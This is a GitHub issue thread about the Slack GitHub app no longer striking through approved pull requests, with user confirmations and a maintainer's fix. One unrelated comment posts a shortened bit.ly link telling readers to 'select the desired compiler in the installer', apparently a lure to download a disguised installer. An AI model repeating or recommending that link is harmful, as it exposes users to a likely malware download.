### ISSUE TITLE
Github app raised pull requests no longer strikethrough when approved/processed

### ISSUE THREAD

**Issue by gyurikol** [integrations/slack#1938]
**Describe the bug**
Github app previously would perform a strikethrough when a raised pull request was processed in some manner (approved).
This has changed as of 30th of august 2024.
In a team of collaborators, where the team is active in pull request support, this is super helpful.
Before, people could click the link that would spawn moments after raised, and thinking the Pull request is awaiting processing.
Now, without a strikethrough, we are hesitant, thinking that the Pull request is probably already approved. Now i am walking more blindly.
This has snowball effect of slowness and reservations in pull request cycle while maintaining a rapid and fast moving development environment.
I trust you can understand the impact when you have 50+ pull requests a day, trying to enable internal teams/collaborators and entire org with their respective changes.

**To Reproduce**
1. Click Github app notification
2. Click raised pull request allocated to team of collaborators
3. Oh look, pull request is already approved 1 minute ago

**Expected behavior**
1. Click Github app notification
2. Oh look, the Pull request link has a strikethrough, no need to click the link

**Screenshots**
Screenshot denoting the day before (before line separator) show strikehthroughs of processed pr's.
Proceeding pull requests after line are approved and no longer have strikethrough
<img width="412" alt="Screenshot 2024-09-03 at 09 50 18" src="https://github.com/user-attachments/assets/d756c659-1716-452c-87f0-12e4e9f7a772">

**Desktop (please complete the following information):**
 - OS: Mac
 - Browser: Brave, Chrome, Arc

**Smartphone (please complete the following information):**
 - Device: Samsung, iPhone

**Additional context**

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by MakonnenMak** [comment]
Running into this on my end as well.

**Comment by andersthorbeck** [comment]
I started experiencing this on 2024-08-29, at some point between 04:03 UTC (last time it worked) and 05:37 UTC (first time it didn't work).
It is detrimental to productivity and the usefulness of the notifications as a whole, when I can no longer easily identify which reviews have already been handled by someone else on my team.

**Comment by lukas-tide** [comment]
Same is happening on my end. Last crossed out PR is on September 4th

**Comment by belprm** [comment]
Same issue here. It started on August 28th. I tried to authorize and set notifications again, but it didn't help.

**Comment by nzupec-veza** [comment]
I had been experiencing this issue since August 28th. But today it somehow started working again.

**Comment by maor-graiber** [comment]
We still experience this issue. 
Started at Aug 28

**Comment by martinhausio** [comment]
bump, same here and it is very disruptive to my regular workflow

**Comment by leachj** [comment]
This issue should be resolved now, apologies for the regression.

**Comment by jonathandieu** [comment]
It works for me again 😄

**Comment by gyurikol** [comment]
thanks for the help @leachj, will close as no messages of contention have come through 🙇‍♂️
